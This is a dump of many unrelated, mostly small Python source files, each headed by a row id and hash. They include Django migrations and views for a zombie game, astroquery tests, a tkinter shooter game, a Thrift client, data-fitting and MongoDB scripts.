'<strong style="font-size: 1.5em;">Profile selector</strong>')
# Layout the widgets
layout = widgets.VBox(
[title,
widgets.HBox([dimension_chooser, slider_label, slider]),
output],
layout=widgets.Layout(align_items="center"))
# For some reason, calling _figure_setup inserts a plot in the output
# Call clear_output to get rid of it.
with output:
clear_output(wait=True)
display(self.fig)
return layout
|
984,635 | 14327fc566f97fb27448fae3efb1021383990568 | #!/usr/bin/python3
"""
# -*- coding: utf-8 -*-
# @Time : 2020/8/28 17:42
# @File : pre_process.py
"""
import torchvision
from torchvision import transforms
from torchtoolbox.transform import Cutout
def normal_transform():
normal = torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
])
return normal
# Todo: Add Pre_Process, adjust your parameters——task five
def data_augment_transform():
data_augment = torchvision.transforms.Compose([
# RandomCrop
transforms.RandomCrop(size=30, padding=2),
Cutout(0.5),
# HorizontalFlip
transforms.RandomHorizontalFlip(p=0.5),
# VerticalFlip
transforms.RandomVerticalFlip(p=0.5),
torchvision.transforms.ToTensor()
])
return data_augment
|
984,636 | 3a18c727e48c2742c065bf528f8e49961b393d26 | t#/usr/bin/python3
if __name__ == '__main__':
print("This is a package , please import it into your code")
|
984,637 | 40795ca7cb66724997c3fa0bcfaf59f5dcf86db1 | # Generated by Django 3.1.7 on 2021-04-20 07:53
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_auto_20210420_1019'),
]
operations = [
migrations.AddField(
model_name='comment',
name='published_date',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='comment',
name='created_date',
field=models.DateTimeField(verbose_name=datetime.datetime(2021, 4, 20, 7, 53, 35, 35821, tzinfo=utc)),
),
migrations.AlterField(
model_name='post',
name='created_date',
field=models.DateTimeField(default=datetime.datetime(2021, 4, 20, 7, 53, 35, 34968, tzinfo=utc)),
),
]
|
984,638 | 7c1db888d6df7dd87417a209251712d4c52aebeb | """ Test Gemini Astroquery module.
For information on how/why this test is built the way it is, see the astroquery
documentation at:
https://astroquery.readthedocs.io/en/latest/testing.html
"""
from datetime import date
import json
import os
import pytest
import requests
from astropy import units
from astropy.coordinates import SkyCoord
from astropy.table import Table
from astroquery import gemini
from astroquery.gemini.urlhelper import URLHelper
DATA_FILES = {"m101": "m101.json"}
class MockResponse:
def __init__(self, text):
self.text = text
def json(self):
return json.loads(self.text)
@pytest.fixture
def patch_get(request):
""" mock get requests so they return our canned JSON to mimic Gemini's archive website """
try:
mp = request.getfixturevalue("monkeypatch")
except AttributeError: # pytest < 3
mp = request.getfuncargvalue("monkeypatch")
mp.setattr(requests.Session, 'request', get_mockreturn)
return mp
def get_mockreturn(url, *args, **kwargs):
""" generate the actual mock textual data from our included datafile with json results """
filename = data_path(DATA_FILES['m101'])
f = open(filename, 'r')
text = f.read()
retval = MockResponse(text)
f.close()
return retval
def data_path(filename):
""" determine the path to our sample data file """
data_dir = os.path.join(os.path.dirname(__file__), 'data')
return os.path.join(data_dir, filename)
""" Coordinates to use for testing """
coords = SkyCoord(210.80242917, 54.34875, unit="deg")
def test_observations_query_region(patch_get):
""" test query against a region of the sky """
result = gemini.Observations.query_region(coords, radius=0.3 * units.deg)
assert isinstance(result, Table)
assert len(result) > 0
def test_observations_query_criteria(patch_get):
""" test query against an instrument/program via criteria """
result = gemini.Observations.query_criteria(instrument='GMOS-N', program_id='GN-CAL20191122',
observation_type='BIAS',
utc_date=(date(2019, 10, 1), date(2019, 11, 25)))
assert isinstance(result, Table)
assert len(result) > 0
def test_observations_query_raw(patch_get):
""" test querying raw """
result = gemini.Observations.query_raw('GMOS-N', 'BIAS', progid='GN-CAL20191122')
assert isinstance(result, Table)
assert len(result) > 0
def test_url_helper_arg():
""" test the urlhelper logic """
urlh = URLHelper()
args = ["foo"]
kwargs = {}
url = urlh.build_url(*args, **kwargs)
assert url == "https://archive.gemini.edu/jsonsummary/notengineering/NotFail/foo"
def test_url_helper_kwarg():
""" test the urlhelper logic """
urlh = URLHelper()
args = []
kwargs = {"foo": "bar"}
url = urlh.build_url(*args, **kwargs)
assert url == "https://archive.gemini.edu/jsonsummary/notengineering/NotFail/foo=bar"
def test_url_helper_radius():
""" test the urlhelper logic """
urlh = URLHelper()
args = []
kwargs = {"radius": "0.4d"}
url = urlh.build_url(*args, **kwargs)
assert url == "https://archive.gemini.edu/jsonsummary/notengineering/NotFail/sr=0.400000d"
def test_url_helper_coordinates():
""" test the urlhelper logic """
urlh = URLHelper()
args = []
kwargs = {"coordinates": "210.80242917 54.348753"}
url = urlh.build_url(*args, **kwargs)
assert url == "https://archive.gemini.edu/jsonsummary/notengineering/NotFail/ra=210.802429/dec=54.348753"
|
984,639 | 463c066c7583e72989a35eec3ce22b55fda4b78c | import sys, os
sys.path.append('./gen-py')
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from services import HelloFriend
from services import FileResourceService
from server import Server
SERVICE_TIMEOUT_IN_mS = 300
# Ustanaiwanie polaczenia z serwerem
class ClientConnection:
transport = ''
server = ''
def __init__(self):
self.log = {}
self.server = Server()
def start(self):
retry = False
socket = self.server.getServer()
while socket != 0:
if retry == True:
socket = self.server.nextServer()
if socket == 0:
print "Usluga niedostepna"
break
host = socket['ip']
port = socket['client_service_port']
try:
# Make socket
self.transport = TSocket.TSocket(host, port)
#self.transport.setTimeout(SERVICE_TIMEOUT_IN_mS)
# Buffering is critical. Raw sockets are very slow
self.transport = TTransport.TBufferedTransport(self.transport)
# Wrap in a protocol
protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
# Create a client to use the protocol encoder
client = HelloFriend.Client(protocol)
client2 = FileResourceService.Client(protocol)
# Connect!
k = self.transport.open()
print "Rozmawialem z: " + socket['ip'] + ':' + str(socket['client_service_port'])
#client.ping()
#print "ping()"
#msg = client.sayHello()
#print msg
return client, client2
except Thrift.TException, tx:
retry = True
print "%s" % (tx.message)
def stop(self):
try:
self.transport.close()
except Thrift.TException, tx:
print "%s" % (tx.message) |
984,640 | 972a02dd915e121dfa16c96ebef1726f9aa1edd5 | # Generated by Django 2.1.7 on 2019-02-22 23:50
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='NaicsCodesData',
fields=[
('codes', models.IntegerField(primary_key=True, serialize=False)),
('titles', models.CharField(blank=True, max_length=300, null=True)),
],
options={
'db_table': 'naics_codes_data',
'managed': False,
},
),
migrations.CreateModel(
name='OshaInspectionData',
fields=[
('activity_nr', models.IntegerField(primary_key=True, serialize=False)),
('reporting_id', models.IntegerField(blank=True, null=True)),
('state_flag', models.CharField(blank=True, max_length=6, null=True)),
('estab_name', models.CharField(blank=True, max_length=128, null=True)),
('site_address', models.CharField(blank=True, max_length=200, null=True)),
('site_city', models.CharField(blank=True, max_length=64, null=True)),
('site_state', models.CharField(blank=True, max_length=2, null=True)),
('site_zip', models.IntegerField(blank=True, null=True)),
('owner_type', models.CharField(blank=True, max_length=32, null=True)),
('owner_code', models.IntegerField(blank=True, null=True)),
('adv_notice', models.CharField(blank=True, max_length=2, null=True)),
('safety_hlth', models.CharField(blank=True, max_length=2, null=True)),
('sic_code', models.IntegerField(blank=True, null=True)),
('naics_code', models.IntegerField(blank=True, null=True)),
('insp_type', models.CharField(blank=True, max_length=20, null=True)),
('insp_scope', models.CharField(blank=True, max_length=20, null=True)),
('why_no_insp', models.CharField(blank=True, max_length=32, null=True)),
('union_status', models.CharField(blank=True, max_length=6, null=True)),
('safety_manuf', models.CharField(blank=True, max_length=10, null=True)),
('safety_const', models.CharField(blank=True, max_length=10, null=True)),
('safety_marit', models.CharField(blank=True, max_length=10, null=True)),
('health_manuf', models.CharField(blank=True, max_length=10, null=True)),
('health_const', models.CharField(blank=True, max_length=10, null=True)),
('health_marit', models.CharField(blank=True, max_length=10, null=True)),
('migrant', models.CharField(blank=True, max_length=10, null=True)),
('mail_street', models.CharField(blank=True, max_length=200, null=True)),
('mail_city', models.CharField(blank=True, max_length=64, null=True)),
('mail_state', models.CharField(blank=True, max_length=2, null=True)),
('mail_zip', models.IntegerField(blank=True, null=True)),
('host_est_key', models.CharField(blank=True, max_length=20, null=True)),
('nr_in_estab', models.IntegerField(blank=True, null=True)),
('open_date', models.DateField(blank=True, null=True)),
('case_mod_date', models.DateField(blank=True, null=True)),
('close_conf_date', models.DateField(blank=True, null=True)),
('close_case_date', models.DateField(blank=True, null=True)),
('ld_dt', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'osha_inspection_data',
'managed': False,
},
),
migrations.CreateModel(
name='OshaSevereInjuryData',
fields=[
('injury_index', models.IntegerField(primary_key=True, serialize=False)),
('incident_id', models.BigIntegerField(blank=True, null=True)),
('event_date', models.DateField(blank=True, null=True)),
('employer', models.CharField(blank=True, max_length=128, null=True)),
('address1', models.CharField(blank=True, max_length=128, null=True)),
('address2', models.CharField(blank=True, max_length=128, null=True)),
('city', models.CharField(blank=True, max_length=64, null=True)),
('state', models.CharField(blank=True, max_length=32, null=True)),
('zipcode', models.IntegerField(blank=True, null=True)),
('latitude', models.FloatField(blank=True, null=True)),
('longitude', models.FloatField(blank=True, null=True)),
('naics_code', models.IntegerField(blank=True, null=True)),
('hospitalized', models.SmallIntegerField(blank=True, null=True)),
('amputation', models.SmallIntegerField(blank=True, null=True)),
('final_description', models.CharField(blank=True, max_length=3000, null=True)),
('body_part', models.CharField(blank=True, max_length=64, null=True)),
],
options={
'db_table': 'osha_severe_injury_data',
'managed': False,
},
),
migrations.CreateModel(
name='SicCodesData',
fields=[
('code', models.SmallIntegerField(primary_key=True, serialize=False)),
('description', models.CharField(blank=True, max_length=128, null=True)),
],
options={
'db_table': 'sic_codes_data',
'managed': False,
},
),
migrations.CreateModel(
name='UsStatesSpatialData',
fields=[
('gid', models.AutoField(primary_key=True, serialize=False)),
('statefp', models.CharField(blank=True, max_length=2, null=True)),
('statens', models.CharField(blank=True, max_length=8, null=True)),
('affgeoid', models.CharField(blank=True, max_length=11, null=True)),
('geoid', models.CharField(blank=True, max_length=2, null=True)),
('stusps', models.CharField(blank=True, max_length=2, null=True)),
('name', models.CharField(blank=True, max_length=100, null=True)),
('lsad', models.CharField(blank=True, max_length=2, null=True)),
('aland', models.FloatField(blank=True, null=True)),
('awater', models.FloatField(blank=True, null=True)),
('geom', django.contrib.gis.db.models.fields.MultiPolygonField(blank=True, null=True, srid=4326)),
],
options={
'db_table': 'us_states_spatial_data',
'managed': False,
},
),
migrations.CreateModel(
name='ZipcodesSpatialData',
fields=[
('gid', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(blank=True, max_length=254, null=True)),
('descriptio', models.CharField(blank=True, max_length=254, null=True)),
('timestamp', models.CharField(blank=True, max_length=24, null=True)),
('begin', models.CharField(blank=True, max_length=24, null=True)),
('end', models.CharField(blank=True, max_length=24, null=True)),
('altitudemo', models.CharField(blank=True, max_length=254, null=True)),
('tessellate', models.BigIntegerField(blank=True, null=True)),
('extrude', models.BigIntegerField(blank=True, null=True)),
('visibility', models.BigIntegerField(blank=True, null=True)),
('draworder', models.BigIntegerField(blank=True, null=True)),
('icon', models.CharField(blank=True, max_length=254, null=True)),
('zcta5ce10', models.CharField(blank=True, max_length=254, null=True)),
('affgeoid10', models.CharField(blank=True, max_length=254, null=True)),
('geoid10', models.CharField(blank=True, max_length=254, null=True)),
('aland10', models.CharField(blank=True, max_length=254, null=True)),
('awater10', models.CharField(blank=True, max_length=254, null=True)),
('geom', django.contrib.gis.db.models.fields.MultiPolygonField(blank=True, dim=4, null=True, srid=4326)),
],
options={
'db_table': 'zipcodes_spatial_data',
'managed': False,
},
),
]
|
984,641 | fa8b6b3906370e1efe689f4d5ad950f092b5e986 | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 2 23:46:43 2014
@author: cbeery
"""
# grid prints a n by n grid of box such that pipes
# and hyphens form walls and plus signs form corners
# input: sidelength, this is the number of boxes
# form one side of the grid;
# assumes non-negative integer
# "output": displays grid
#
wallChar = 4 #the number of chars in a wall
heightGoal = 0 #counts reps for vert walls
j = 0 # tracks current box height
def make_grid(sideLength):
global j
j = 0 #resets j
if(j < sideLength):
make_top(sideLength)
make_rest(sideLength)
def make_rest(s):
global j
if (j < s):
make_walls(s)
make_top(s)
j = j + 1
make_rest(s)
#makes one horizonal set of walls
def make_top(s):
print('+' + (' -'*wallChar + ' +')*s)
#makes one set of box length of vertical walls
def make_walls(s):
global heightGoal
if(heightGoal < wallChar):
print('|'),
print((' '*wallChar*2 + '| ')*s )
heightGoal = heightGoal + 1;
make_walls(s)
else:
heightGoal = 0 #reset height goal
##
make_grid(3)
make_grid(4)
|
984,642 | 631494313922fb6098d9c110fae98a8d199ce4e0 | # -*- coding: utf-8 -*-
from mustaine.client import HessianProxy
import urllib2
import json
proxy = HessianProxy('http://webservice.build.index.com:9011/webservice/3gcms')
class DocFetcher:
def fetchDoc(self, channelid, ftime, ttime, offset, size):
return proxy.get3GArticles(channelid, ftime, ttime, offset, size)
def getDocByTopic(self, topicid, offset, size):
docs = proxy.getTopicArticle(topicid, offset, size)
for doc in docs:
print 'id len: %d' % len(doc['docid'])
doc['body'] = self.getBody(doc['docid'])
print 'body len: %d, topicid: %s' % (len(doc['body']), doc['topicid'])
return docs
def getBody(self, docid):
url = 'http://c.3g.163.com/nc/article/%s/full.html' % docid
response = urllib2.urlopen(url)
docInfo = response.read()
docJson = json.loads(docInfo)
if docJson[docid].has_key('body'):
return docJson[docid]['body']
else:
return ''
if __name__ == '__main__':
fetcher = DocFetcher()
# print fetcher.doFetch('0096', '2015-04-01 00:00:00', '2015-04-03 00:00:00', 0, 1)
print fetcher.getDocByTopic('003402E6', 1, 2);
# fetcher.getBody('AM2U46HE00964L1F')
|
984,643 | da4535c6b677c8fe2bd83675d58c16bb79987f8c | from social_core.backends.facebook import FacebookOAuth2
from . import BaseBackend
from ...site import AuthenticationBackends
class CustomFacebookOAuth2(BaseBackend, FacebookOAuth2):
DB_NAME = AuthenticationBackends.FACEBOOK
|
984,644 | bef50526bf4691760d960bf70ac5ffd67ea6457e | __author__ = 'frieder'
import random
import EventController
class Node:
def __init__(self,id,samplingRate,location = "Santander",):
self.samplingRate = samplingRate
self.id = id
self.location = location
self.type = "Random Generator Source Node"
def getSensorValue(self):
return random.randint(1,10)
def getSamplingRate(self):
return self.samplingRate
def getId(self):
return self.id
def getLocation(self):
return self.location
def getDescription(self):
return EventController.mapSensorToRoom(self.id)
def getPluginType(self):
return self.type
|
984,645 | deb545d02eb0f7c9690ae10ade0e1569eb6717f9 | # coding=utf-8
from pymongo import MongoClient
import pymongo
import json
from bson.objectid import ObjectId
client = MongoClient("192.168.8.200:27000")
target_db = client['single_cluster']
target_collection = target_db['clusters']
def move_to_one_collection():
db = client['cluster_demo']
collection_name_list = db.list_collection_names()
for name in collection_name_list:
collection = db[name]
records = collection.find()
for item in records:
target_collection.insert_one(item)
print 'finished'
def get_event_by_pagenum_pagesize(pagenum, pagesize, collection):
'''
获取事件,事件列表
:param pagenum: 页码
:param pagesize: 页显示条数
:param collection: 对应事件数据库
:return: str(json) 事
id: 事件唯一标识
tweet: 事件推文概览
summary:关键词概要
'''
records = target_collection.find().skip((pagenum - 1) * pagesize).limit(pagesize).sort("_id", pymongo.ASCENDING)
events_list = []
for record in records:
simple_msg = {}
simple_msg['id'] = str(record.get("_id"))
simple_msg['tweet'] = record.get('tweet_list')[0]['text']
simple_msg['keyword'] = record.get('summary').get('keywords')
if len(simple_msg['keyword']) > 15:
simple_msg['keyword'] = simple_msg['keyword'][0:15]
events_list.append(simple_msg)
print json.dumps(events_list, indent=4, ensure_ascii=False)
def get_tweets_by_id(obj_id, page_num=1, pagesize=10):
obj_id = ObjectId(obj_id)
event = target_collection.find_one({'_id': obj_id})
tweets_list = []
if event is not None:
tweets = event.get('tweet_list')
paged_tweets = tweets[(page_num - 1) * pagesize:page_num * pagesize]
for item in paged_tweets:
pass
# print paged_tweets
if __name__ == '__main__':
get_event_by_pagenum_pagesize(2, 10, target_collection)
# id = "5baf287917cc126f44e3bb55"
# get_tweets_by_id(id)
|
984,646 | 96e24924aff6bb89b275925660470b3543b80e1a | import logging
from typing import Optional, Iterable
from . import View
from . import Model
from . import Statement
log = logging.getLogger(__name__) # pylint: disable=C0103
class Query:
def __init__(self, view: View, statements: Optional[Iterable[Statement]] = None):
log.debug('Query.__init__')
self.view = view
self.statements = statements or []
def filter(self, statement: Statement) -> 'Query':
log.debug('Query.filter')
return Query(self.view, self.statements + [statement])
def fetch(self) -> Iterable[Model]:
log.debug('Query.fetch')
return (val for key, val in self.view.items() if all(statement(self.view.indexer, key) for statement in self.statements))
|
984,647 | b1d8b8a4899011ffaf577a2db2e4c8944735dcbe | import context
from src.petsittingco.application import db
from src.petsittingco.database import Account, Pet, Job
from werkzeug.security import generate_password_hash
acc1 = Account(id = "1", is_owner = True, is_sitter = False, is_shelter = False, is_admin = False, first_name = "John", last_name = "Smith", email = "JSmith@test.com", password = generate_password_hash("password123AIJI",method="SHA512"), address="1234 North Lincoln Road", phone_number="867-5309")
pet1 = Pet(id = "1", owner = acc1, name = "Fluffy", attributes = "{'Aggressive':'False'}")
job1 = Job(id = "1",lat=0.05, long=0.05,is_at_owner = True, canceled = False, start_datetime = "01/01/2020,15:30", end_datetime = "01/01/2020,16:30", location = "1234 Shady Lane, Baltimore, Maryland 21043", sitter = acc1, owner = acc1, accepted = False, details = "Please feed twice a day with food from cabinet")
try:
db.session.add(acc1)
except Exception as e:
print(e)
try:
db.session.add(pet1)
except Exception as e:
print(e)
try:
db.session.add(job1)
except Exception as e:
print(e)
try:
db.session.commit()
except Exception as e:
print(e) |
984,648 | 2aba5fe2acd1ece04c7b678ac465b331759b1be4 | def dfs(nums, path, result):
if (len(nums) == len(path)):
result.append(path[:])
return
for n in nums:
if n in path:
continue
path.append(n)
dfs(nums, path, result)
path.pop()
def permute(nums):
res = []
if not nums:
return res
dfs(nums, [], res)
return res
print(permute([1, 2, 3]))
|
984,649 | 2b438825c5d7d8c2093089a08a273a76bf39f916 | from tkinter import *
import tkinter.messagebox
import time
import random
import winsound
window = Tk()
window.title ("Space Shooter")
img1 = PhotoImage(file="ship.png")
img2 = PhotoImage(file="missle_purple.png")
img3 = PhotoImage(file="missle_red.png")
points = 0
def play_shoot():
winsound.PlaySound('shoot.wav', 1)
def play_boom():
winsound.PlaySound('explosion.wav', 1)
def play_launch():
winsound.PlaySound('launch.wav', 1)
def new_game():
active = True
global points
points = 0
play_launch()
canvas = Canvas(window, width = 800, height = 650)
canvas.pack()
ship = canvas.create_image(360, 550, anchor=NW, image=img1)
rand_left = random.randint(50,750)
rand_top = random.randint(100,700)
missle1 = canvas.create_image(rand_left, -rand_top, anchor=NW, image=img2)
rand_top = random.randint(100,700)
rand_left = random.randint(50,750)
missle2 = canvas.create_image(rand_left, -rand_top, anchor=NW, image=img3)
score = Label(window, text="Score: 0")
score.config(font=("Courier", 24))
score.pack()
def game_over():
play_boom()
active = False
canvas.destroy()
score.destroy()
PlayAgain = tkinter.messagebox.askyesno ('Game Over','Do you want to play again?')
if PlayAgain:
new_game()
else:
window.destroy()
raise SystemExit
def update_score():
global points
score.config(text="Score: %i" % points)
score.update_idletasks()
def move_left(evt):
pos = canvas.coords(ship)
if pos[0] > 0:
canvas.move(ship, -15, 0)
def move_right(evt):
pos = canvas.coords(ship)
if pos[0] < 730:
canvas.move(ship, 15, 0)
shots = []
def shoot(evt):
pos = canvas.coords(ship)
shot = canvas.create_rectangle(pos[0]+35, 530, pos[0]+40, 540, fill='green')
shots.append(shot)
play_shoot()
def move_shots():
for shot in shots:
canvas.move(shot, 0, -5)
pos = canvas.coords(shot)
m1_pos = canvas.coords(missle1)
m2_pos = canvas.coords(missle2)
if pos[1] <= 0:
canvas.delete(shot)
shots.remove(shot)
elif pos[1] <= m1_pos[1]+257 and pos[1] > m1_pos[1]:
if pos[0] >= m1_pos[0]+5 and pos[0] <= m1_pos[0]+67:
print ("HIT1!")
reset_missle1()
canvas.delete(shot)
shots.remove(shot)
elif pos[1] <= m2_pos[1]+257 and pos[1] > m2_pos[1]:
if pos[0] >= m2_pos[0]+5 and pos[0] <= m2_pos[0]+67:
print ("HIT2!")
reset_missle2()
canvas.delete(shot)
shots.remove(shot)
def move_missles():
canvas.move(missle1, 0, 2)
pos = canvas.coords(missle1)
ship_pos = canvas.coords(ship)
if pos[1]+257 >= 650:
game_over()
elif pos[1]+257 >= 550 and pos[0]+67 >= ship_pos[0] and pos[0] <= ship_pos[0]+76:
game_over()
canvas.move(missle2, 0, 2)
pos = canvas.coords(missle2)
if pos[1]+257 >= 650:
game_over()
elif pos[1]+257 >= 550 and pos[0]+67 >= ship_pos[0] and pos[0] <= ship_pos[0]+76:
game_over()
def reset_missle1():
rand_left = random.randint(100,700)
rand_top = random.randint(100,700)
canvas.coords(missle1, rand_left, -rand_top)
play_boom()
global points
points += 10
update_score()
def reset_missle2():
rand_left = random.randint(50,750)
rand_top = random.randint(100,700)
canvas.coords(missle2, rand_left, -rand_top)
play_boom()
global points
points += 10
update_score()
canvas.bind_all('<KeyPress-Left>', move_left)
canvas.bind_all('<KeyPress-Right>', move_right)
canvas.bind_all('<space>', shoot)
while active:
move_shots()
move_missles()
window.update_idletasks()
window.update()
time.sleep(.015)
new_game() |
984,650 | 195ac59bfa651482b6536e017ca8fecd5c2672ac | """blogengine URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from .views import *
urlpatterns = [
path('', api, name = "api_url"),
path('test/',test),
path('core/v1/subscribers/existence', subscribers_existence, name = "api_subscribers_existence_url"),
path('core/v1/debitor/existence', debitor_existence, name = "api_debitor_existence_url"),
path('core/v1/debitor/create', debitor_create, name = "api_debitor_create_url"),
path('core/v1/dolg/create', dolg_create, name = "api_dolg_create_url"),
path('core/v1/history/create', history_create, name = "api_history_create_url"),
]
|
984,651 | bcd4d87f73f6c1686ba3dd3448bcf6cf8e29aee3 | # -*- encoding: utf-8 -*-
import datetime
import os
from django import template
from django.template import Node, resolve_variable, TemplateSyntaxError
from django.conf import settings
from djtrac.utils import url_params
register = template.Library()
@register.filter
def to_datetime(t):
"""
:param t: время в микросекундах
:return:
"""
if t:
return datetime.datetime.fromtimestamp(int(t*0.000001))
@register.filter
def djtrac_ticket_url(ticket_id):
return os.path.join(settings.HTTP_PATH_TO_TRAC, "neo/ticket/", str(ticket_id))
class AddParameter(Node):
"""https://djangosnippets.org/snippets/361/"""
def __init__(self, varname, value):
self.varname = varname
self.value = value
def render(self, context):
req = resolve_variable('request', context)
params = req.GET.copy()
try:
value = resolve_variable(self.value, context)
except Exception:
value = self.value
params[self.varname] = value
return '%s?%s' % (req.path, params.urlencode())
def addurlparameter(parser, token):
from re import split
bits = split(r'\s+', token.contents, 2)
if len(bits) < 2:
raise TemplateSyntaxError, "'%s' tag requires two arguments" % bits[0]
return AddParameter(bits[1],bits[2])
register.tag('addurlparameter', addurlparameter)
@register.filter
def get_params(request):
return url_params(request, as_is=True, use_urllib=True, except_params="page")
|
984,652 | fc05c7b235f4c1351d74eae9c791ec5f19f81b18 | print("Twinkle, twinkle, little star,")
print('\t',"How I wonder what you are!")
print('\t','\t',"Up above the world so high,")
print('\t','\t',"Like a diamond in the sky.")
print("Twinkle, twinkle, little star,")
print('\t',"How I wonder what you are")
import sys
print("Python version")
print (sys.version)
from datetime import datetime
now = datetime. now()
print(now)
Radius=int(input("Enter Radius:"))
Area=3.142*(Radius**2)
print("Area of circle:",Area)
First=input("Enter First Name:")
Last=input("Enter Last Name:")
Name=Last[::-1]+ " " +First[::-1]
print(Name)
x=int(input("Enter x:"))
y=int(input("Enter y:"))
z=x+y
print(z)
|
984,653 | 2654a7ec81b56b625d128a4748840c2552f0905d | vel = float(input('Informe a velocidade do carro em Km/h'))
if (vel > 80):
print('Você foi multado')
vel -= 80
print('Sua multa é de R${:.2f}'.format(vel * 7.00))
else:
print('Dirija com segunça')
print('Siga em frente') |
984,654 | 4921c9045a7e6deb0138c957aeea75cafe02609d | #!/usr/bin/env python
import cProfile
import pstats
from subprocess import PIPE, Popen
import numpy as np
from lmfit import Parameters, minimize
def get_git_version():
proc = Popen(['git', 'rev-parse', '--short', 'HEAD'], stdout=PIPE)
return proc.communicate()[0].strip()
# define objective function: returns the array to be minimized
def fcn2min(params, x, data):
"""model decaying sine wave, subtract data"""
amp = params['amp']
shift = params['shift']
omega = params['omega']
decay = params['decay']
model = amp * np.sin(x * omega + shift) * np.exp(-x*x*decay)
return model - data
def run_fit(nruns=100):
# create data to be fitted
x = np.linspace(0, 15, 601)
np.random.seed(201)
for i in range(nruns):
data = (5. * np.sin(2 * x - 0.1) * np.exp(-x*x*0.025) +
np.random.normal(size=len(x), scale=0.1))
params = Parameters()
params.add('amp', value=1.0, min=0.0, max=100.0)
params.add('decay', value=0.0, min=-1.0, max=10.0)
params.add('shift', value=0.0, min=-np.pi/2., max=np.pi/2)
params.add('omega', value=1.0, min=-10.0, max=10.0)
out = minimize(fcn2min, params, args=(x, data))
# print(out.params['amp'])
assert out.params['amp'].value < 5.5
assert out.params['amp'].value > 4.5
assert out.params['omega'].value < 2.25
assert out.params['omega'].value > 1.75
# print(out.params['amp'])
def show_profile(filename):
stats = pstats.Stats(filename)
stats.strip_dirs().sort_stats('tottime').print_stats(20)
def profile_command(command, filename=None):
gitversion = get_git_version()
if filename is None:
filename = '%s.prof' % gitversion
cProfile.run(command, filename=filename)
show_profile(filename)
profile_command('run_fit()')
|
984,655 | 8fb96b150a4b0d1e35a78b465f3388c6c00b3211 | import pandas as pd
dic = {"สมศรี":167, "พิมพ์พร":170, "สุดใจ":165, "สมหญิง":164}
ps = pd.Series(dic)
print("------------------------------------")
print(type(dic))
print(ps)
|
984,656 | 8b49e70d5ced861c1743d9efb0a3a0d6afa8ebf9 | class Solution:
def maxSubArrayLen(self, a: List[int], k: int) -> int:
g = {0 : -1}
s = 0
z = 0
for i in range(len(a)):
s += a[i]
if s - k in g:
z = max(z, i - g[s - k])
if s not in g:
g[s] = i
return z |
984,657 | 1d8e5b09475a2d32b31e39b0deba80dae38a7bd2 | #!/usr/bin/env python
import unittest
class MyTest(unittest.TestCase):
base_url = "http://139.196.43.67:8080/"
# def setUp(self,url):
# self.base_url = "http://139.196.43.67:8080/"
# return self.base_url
def tearDown(self):
print(self.result)
|
984,658 | 81d9feafebe97ac6330ec2b6e70e47a8cdcb4494 | import user
from models import UserProfile
from django.shortcuts import render, render_to_response
from forms import UserForm, UserProfileForm
from django.contrib.auth import authenticate, logout
from django.contrib.auth import login as auth_login
from django.http import HttpResponseRedirect, HttpResponse
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from engine.main import show_game_screen
from engine.game import Game
import pickle
#Homepage view
def index(request):
return render(request, 'zombieGame/index.html')
#About page view
def about(request):
return render(request, 'zombieGame/about.html')
#Login view
def login(request):
context_dict = {'boldmessage': "login"}
return render(request, 'zombieGame/login.html', context_dict)
#Profile view, requires user to be logged in
@login_required
def profile(request):
days = request.user.userprofile.days
kills = request.user.userprofile.kills
people = request.user.userprofile.people
food = request.user.userprofile.food
ammo = request.user.userprofile.ammo
time = request.user.userprofile.time
profile = request.user.userprofile
if profile.days > 30:
profile.survivorBadge = True
if profile.kills > 50:
profile.killerBadge = True
if profile.food > 80:
profile.staminaBadge = True
if profile.people > 40:
profile.partyBadge = True
context_dict = {'profile': profile, 'days': days, 'kills': kills, 'people': people,
'food': food,'ammo': ammo, 'time': time}
return render(request, 'zombieGame/profile.html', context_dict)
@login_required
def game(request):
g=Game()
t=''
player = request.user.userprofile
#Can initialise these using player state !!??
pps = pickle.dumps(g.player_state)
kills = 0
days = 0
food = 3
ammo = 2
people = 1
g.player_state = pickle.loads(pps)
context_dict = {'player':player, 'game_over':False, 'new_day':False, 'kills':kills, 'food':food, 'days':days, 'ammo': ammo, 'party': people,
'player_state': g.player_state }
if g.is_game_over():
context_dict['game_over'] = True
else:
g.start_new_day()
if g.is_day_over():
g.end_day()
g.start_new_day()
if context_dict['game_over'] == False and context_dict['new_day'] == False:
if t == 'MOVE':
g.take_turn('MOVE')
elif t == ('ENTER'):
g.take_turn('ENTER')
elif t == ('WAIT'):
g.take_turn('WAIT')
elif t == ('FIGHT'):
g.take_turn('FIGHT')
elif t == ('SEARCH'):
g.take_turn('SEARCH')
elif t == ('EXIT'):
g.take_turn('EXIT')
elif t ==('RUN'):
g.take_turn('RUN')
context_dict = fill_dict(g)
context_dict['state'] = str(g.player_state)
context_dict['gstate'] = g.game_state
context_dict['time'] = g.time_left
if g.is_game_over():
context_dict={'game_over':True}
elif g.is_day_over():
context_dict={'new_day':True}
if g.update_state.party<0:
print "You lost: {0} people".format(abs(g.update_state.party))
elif g.update_state.party>0:
print "{0} more people have joined your party".format(g.update_state.party)
elif g.update_state.ammo > 0:
print "You found: {0} units of ammo".format(g.update_state.ammo)
elif g.update_state.ammo < 0:
print "You used: {0} units of ammo".format(abs(g.update_state.ammo))
elif g.update_state.food > 0:
print "You found: {0} units of food".format(g.update_state.food)
elif g.update_state.food < 0:
print "You used: {0} units of food".format(abs(g.update_state.food))
elif g.update_state.kills > 0:
print "You killed: {0} zombies".format(g.update_state.kills)
